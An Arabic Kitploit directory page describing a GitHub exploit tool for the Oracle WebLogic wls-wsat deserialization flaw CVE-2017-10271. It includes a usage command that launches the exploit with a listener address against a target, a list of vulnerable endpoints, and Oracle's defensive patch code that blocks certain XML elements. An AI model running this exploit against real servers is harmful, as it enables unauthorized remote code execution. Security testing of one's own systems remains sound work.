Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2017-10271 — أداة استغلال تنفيذ التعليمات البرمجية عن بُعد في Oracle WebLogic WLS-WSAT (CVE-2017-10271) | Kitploit
أدوات/GitHubGitHub/kkirsche/cve-2017-10271
أطر الاستغلالتوليد الحمولةتحليل الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويباختبار الاختراق
GitHubkkirsche/cve-2017-10271

CVE-2017-10271

أداة استغلال تنفيذ التعليمات البرمجية عن بُعد في Oracle WebLogic WLS-WSAT (CVE-2017-10271)

عرض المستودع
12942منذ 3 سنواتتمت المراجعة من قبل Kitploit

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

CVE-2017-10271

سكربت اكتشاف واستغلال ثغرة إلغاء التسلسل في مكوّن wls-wsat الخاص بـ Weblogic (CVE-2017-10271)

الاستخدام

root@kitploit:~
$ python CVE-2017-10271.py -l 10.10.10.10 -p 4444 -r http://will.bepwned.com:7001/

الميزات

  • سكربت Python مستقل
    • وظيفة فحص لمعرفة ما إذا كان أي مضيف معرّضًا للخطر
    • وظيفة استغلال للأهداف التي تعمل بنظام Linux
  • وحدة Metasploit
    • وظيفة فحص لمعرفة ما إذا كان أي مضيف معرّضًا للخطر
    • وظيفة استغلال لجميع الأهداف
  • الماسح الضوئي (./scanners)
    • يتحقق مما إذا كانت المضيفات معرّضة للخطر. مكتفٍ ذاتيًا بالكامل

إشعارات قانونية

أنت مسؤول عن استخدام هذا السكربت. لا يتحمل Kevin Kirsche أي مسؤولية عن أي إجراءات يتم اتخاذها باستخدام الكود الموجود هنا. تم إنشاء الكود للفرق التي تسعى إلى التحقق من أمان خوادمها، وليس للاستخدام الخبيث.

شكر وتقدير

شكر كبير إلى Luffin لإنشاء الإثبات الأولي (POC) الأصلي الذي استند إليه هذا العمل: https://github.com/Luffin/CVE-2017-10271

عناوين URL المعرّضة للخطر بخلاف العنوان الموضح:

root@kitploit:~
/wls-wsat/CoordinatorPortType
/wls-wsat/CoordinatorPortType11
/wls-wsat/ParticipantPortType
/wls-wsat/ParticipantPortType11
/wls-wsat/RegistrationPortTypeRPC
/wls-wsat/RegistrationPortTypeRPC11
/wls-wsat/RegistrationRequesterPortType
/wls-wsat/RegistrationRequesterPortType11

ثغرة ذات صلة

CVE 2017-3506

تصحيح Oracle

المصدر الأصلي: https://blog.nsfocusglobal.com/threats/vulnerability-analysis/technical-analysis-and-solution-of-weblogic-server-wls-component-vulnerability/

المصدر المحدّث: https://nsfocusglobal.com/technical-analysis-and-solution-of-weblogic-server-wls-component-vulnerability/

root@kitploit:~
private void validate(InputStream is) {
 WebLogicSAXParserFactory factory = new WebLogicSAXParserFactory();
 
 try {
  SAXParser parser = factory.newSAXParser();
  
  parser.parse(is, new DefaultHandler()) {
   private int overallarraylength = 0;
   
   public void startElement(String uri, String localName, String qName, Attributes attributes) throws SAXEception {
    if (qName.equalsIgnoreCase("object")) {
     throw new IllegalStateException("Invalid element qName:object");
    } else if (qName.equalsIgnoreCase("new")) {
     throw new IllegalStateException("Invalid element qName:new");
    } else if (qName.equalsIgnoreCase("method")) {
     throw new IllegalStateException("Invalid element qName:method");
    } else {
     if (qName.equalsIgnoreCase("void")) {
      for(int attClass = 0;attClass < attributes.getLength(); ++attClass) {
       if (!"index".equalsIgnoreCase(attributes.getQName(attClass))) {
        throw new IllegalStateException("Invalid attribute for element void: " + attributes.getQName(attClass));
       }
      }
     }
     
     ... more code here ...
    }
   }
  }
 }
}
تنزيل الأداة